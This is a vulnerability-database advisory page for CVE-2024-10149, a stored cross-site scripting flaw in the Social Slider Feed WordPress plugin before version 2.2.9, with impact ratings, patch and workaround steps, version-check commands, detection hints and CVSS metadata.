Login Sign Up

CVE-2024-10149

4.8 MEDIUM
Cross-Site Scripting

📋 TL;DR

The Social Slider Feed WordPress plugin before version 2.2.9 contains a stored cross-site scripting (XSS) vulnerability in its settings. This allows authenticated administrators to inject malicious scripts that execute when other users view affected pages, even in WordPress multisite installations where unfiltered_html is restricted. Only WordPress sites using vulnerable versions of this specific plugin are affected.

💻 Affected Systems

Products:
  • Social Slider Feed WordPress Plugin
Versions: All versions before 2.2.9
Operating Systems: All operating systems running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WordPress installation with plugin enabled. Vulnerability is present in default configuration.

📦 What is this software?

Social Slider Widget by Cm Wp

View all CVEs affecting Social Slider Widget →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with admin privileges could inject malicious JavaScript that steals session cookies, redirects users to phishing sites, or performs actions on behalf of authenticated users, potentially leading to complete site compromise.

🟠

Likely Case

Malicious admin injects scripts that affect other users viewing plugin content, potentially stealing credentials or performing unauthorized actions.

🟢

If Mitigated

With proper user access controls and regular plugin updates, impact is limited to potential minor data exposure from trusted administrators.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires administrative access to WordPress. No public exploit code has been identified.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2.2.9

Vendor Advisory: https://wpscan.com/vulnerability/1619dc4b-4e5e-4b82-820b-3c4e732db3ad/

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find 'Social Slider Feed' and click 'Update Now'. 4. Verify version shows 2.2.9 or higher.

🔧 Temporary Workarounds

Disable Plugin

all

Temporarily disable the vulnerable plugin until patched

wp plugin deactivate social-slider-feed

Restrict Admin Access

all

Limit administrative accounts to trusted personnel only

🧯 If You Can't Patch

  • Remove the Social Slider Feed plugin completely
  • Implement strict Content Security Policy (CSP) headers to mitigate XSS impact

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel → Plugins → Social Slider Feed → Version. If version is below 2.2.9, system is vulnerable.

Check Version:

wp plugin get social-slider-feed --field=version

Verify Fix Applied:

After update, confirm version shows 2.2.9 or higher in WordPress plugins list.

📡 Detection & Monitoring

Log Indicators:

  • Unusual plugin setting modifications by admin users
  • Multiple failed update attempts for Social Slider Feed plugin

Network Indicators:

  • Unexpected JavaScript in plugin settings pages
  • Suspicious outbound connections from plugin content pages

SIEM Query:

source="wordpress" AND (plugin="social-slider-feed" AND version<"2.2.9")

📊 Metadata

CVE ID: CVE-2024-10149
CVSS v3 Score: 4.8 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
EPSS Score: 0.05% exploit probability (16.8th percentile)
Published: May 15, 2025
Last Updated: June 9, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-10149, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)